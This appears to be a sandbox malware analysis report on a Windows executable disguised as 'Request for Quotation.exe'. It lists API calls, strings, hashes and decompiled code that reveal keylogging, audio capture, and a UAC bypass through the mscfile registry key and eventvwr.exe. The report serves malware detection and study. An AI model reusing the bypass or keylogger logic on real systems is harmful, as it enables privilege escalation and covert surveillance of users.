                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                                                                • malloc.MSVCRT ref: 00405E37
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                                                                • sprintf.MSVCRT ref: 00405E69
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                                                                • SetEvent.KERNEL32(00000000), ref: 00405E95
                                                                                • free.MSVCRT(00000000), ref: 00405E9C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                • API String ID: 2201004561-248792730
                                                                                • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                                                                • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                                                                • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                                                                • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                                                                • #3.WS2_32 ref: 00401266
                                                                                • ExitThread.KERNEL32 ref: 00401274
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,0041B310,00000000), ref: 0040129D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(0041B218,00000012,?,0041B310,00000000), ref: 004012B3
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                                                                • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@wave
                                                                                • String ID:
                                                                                • API String ID: 3251938569-0
                                                                                • Opcode ID: 261b6f7c094be9f934f09ce18ff1ed9fdb1ee29c80e1dbdf0ee113b883a51e88
                                                                                • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
                                                                                • Opcode Fuzzy Hash: 261b6f7c094be9f934f09ce18ff1ed9fdb1ee29c80e1dbdf0ee113b883a51e88
                                                                                • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E00402637(void* __ecx, intOrPtr _a4) {
                                                                                				char _v5;
                                                                                				struct _SYSTEMTIME _v24;
                                                                                				char _v40;
                                                                                				char _v56;
                                                                                				char* _t42;
                                                                                				char* _t43;
                                                                                				char* _t50;
                                                                                				char* _t51;
                                                                                				void* _t68;
                                                                                				void* _t69;
                                                                                
                                                                                				_t68 = __ecx;
                                                                                				if( *((char*)(__ecx + 0x38)) == 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				if( *0x41bcac != 0) {
                                                                                					if( *((char*)(__ecx + 0x44)) != 0) {
                                                                                						GetLocalTime( &_v24);
                                                                                						_t50 =  &_v5;
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                                                                						_t51 =  &_v40;
                                                                                						L00414170();
                                                                                						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
                                                                                						printf(_t51);
                                                                                						_t69 = _t69 + 0x24;
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
                                                                                					}
                                                                                					_t16 = _t68 + 0x3c; // 0x0
                                                                                					if( *_t16 != _a4) {
                                                                                						GetLocalTime( &_v24);
                                                                                						_t42 =  &_v5;
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                                                                						_t43 =  &_v56;
                                                                                						L00414170();
                                                                                						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
                                                                                						printf(_t43);
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					}
                                                                                				}
                                                                                				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
                                                                                				return 1;
                                                                                			}














                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                                                                • printf.MSVCRT ref: 004026B5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                                                                • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                                                                • printf.MSVCRT ref: 00402722
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                                                                • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                                                                • API String ID: 1710008465-2297210016
                                                                                • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                                                                • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                                                                • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                                                                • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\Desktop\Request for Quotation.exe,?), ref: 0040318F
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                                                                • exit.MSVCRT ref: 004031D8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                                                                Strings
                                                                                • Software\Classes\mscfile\shell\open\command, xrefs: 0040319B
                                                                                • eventvwr.exe, xrefs: 004031A6
                                                                                • origmsc, xrefs: 00403160
                                                                                • open, xrefs: 004031C6
                                                                                • C:\Users\user\Desktop\Request for Quotation.exe, xrefs: 0040318A
                                                                                • mscfile\shell\open\command, xrefs: 0040311C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                                                                • String ID: C:\Users\user\Desktop\Request for Quotation.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                                • API String ID: 2587331422-2563356844
                                                                                • Opcode ID: fcbf0af6d31253a8874abbd0374637abbeafe6e0dff6ad8f6dbf99a049f326b2
                                                                                • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                                                                • Opcode Fuzzy Hash: fcbf0af6d31253a8874abbd0374637abbeafe6e0dff6ad8f6dbf99a049f326b2
                                                                                • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                                                                  • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                                                                  • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                                                                  • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Strings
                                                                                • open, xrefs: 0040D70B
                                                                                • C:\Users\user\Desktop\Request for Quotation.exe, xrefs: 0040D752
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                                                                • String ID: C:\Users\user\Desktop\Request for Quotation.exe$open
                                                                                • API String ID: 2112629403-3163107129
                                                                                • Opcode ID: 9b4f93c1b31942b18b1f72dc9b2dfc27091bc5646dae252cc341dd488c049f64
                                                                                • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                                                                • Opcode Fuzzy Hash: 9b4f93c1b31942b18b1f72dc9b2dfc27091bc5646dae252cc341dd488c049f64
                                                                                • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041BA5C,?), ref: 0040318F
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                                                                • exit.MSVCRT ref: 004031D8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                                                                • String ID: Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                                • API String ID: 2587331422-3923289169
                                                                                • Opcode ID: fcbf0af6d31253a8874abbd0374637abbeafe6e0dff6ad8f6dbf99a049f326b2
                                                                                • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                                                                • Opcode Fuzzy Hash: fcbf0af6d31253a8874abbd0374637abbeafe6e0dff6ad8f6dbf99a049f326b2
                                                                                • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetKeyboardLayoutNameA.USER32 ref: 0040D9AF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                                                                  • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
